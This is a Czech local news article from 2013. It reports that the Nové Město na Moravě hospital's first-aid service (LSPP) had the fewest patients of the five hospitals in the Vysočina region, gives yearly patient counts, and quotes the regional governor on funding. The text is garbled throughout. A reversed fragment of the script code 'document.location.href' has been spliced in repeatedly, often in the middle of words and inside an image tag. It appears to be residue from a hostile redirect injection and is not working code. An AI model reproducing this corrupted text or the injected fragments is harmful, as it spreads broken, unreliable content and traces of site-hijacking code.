Nové Město na Moravě, nove mesto na morave, aktuality, nemocnice, LSPP
Rainbow page separator

LSPP v novoměstské nemocnici je využívána nejméně v kraji

Sobota, 30. března 2013

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave-virtualni-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru-dajc1.jpg“>38910-nemocnice-nove-mes<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave-virtualni-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru-dajc“ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/38910-nemocnice-nove-mes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave-virtualni-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru-dajc1-300×200.jpg“ width=“300″ height=“200″ />Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nejméně pacientů ze všech pěti nemocnic v kraji míří na poho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost v nemocnici v Novém Městě. Vyplývá [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z aktuální statistiky Kraje Vysočina.

V roce 2012 tamní Lékařskou službu první pomoci (LSPP) vyhledalo 3193 lidí, v roce 2011 [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo 3093 ošetřených a v roce 2010 pak 3661 pacientů. Po všechny tři roky [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo nejméně v rámci celého kraje, ačkoliv novoměstská nemocnice není podle počtu klientů nejmenší na Vysočině.

Nejvíce je využívána poho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost v jihlavské nemocnici, kde vloni ošetřili 7557 lidí, následuje ji nejmenší krajská nemocnice v Pelhřimově s 5915 klienty.

V roce 2012 vyhledalo LSPP ve všech pěti krajských nemocnicích celkem 26 817 lidí. Oproti roku 2011 došlo k nárůstu ošetřených pacientů o více než tři procenta.

„Kraj Vysočina přispívá na zajištění lékařské poho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovosti každoročně 20 miliony korun rozdělenými stejným dílem mezi krajské nemocnice. Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že náklady na zajištění té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to služby rok od roku ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojíme před rozhodnutím, zda stávající model posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované služby zachovat, nebo přijít se změnou. Ta však musí být podložena reálnými čísly,“ uvedl hejtman Kraje Vysočina Jiří Běhounek.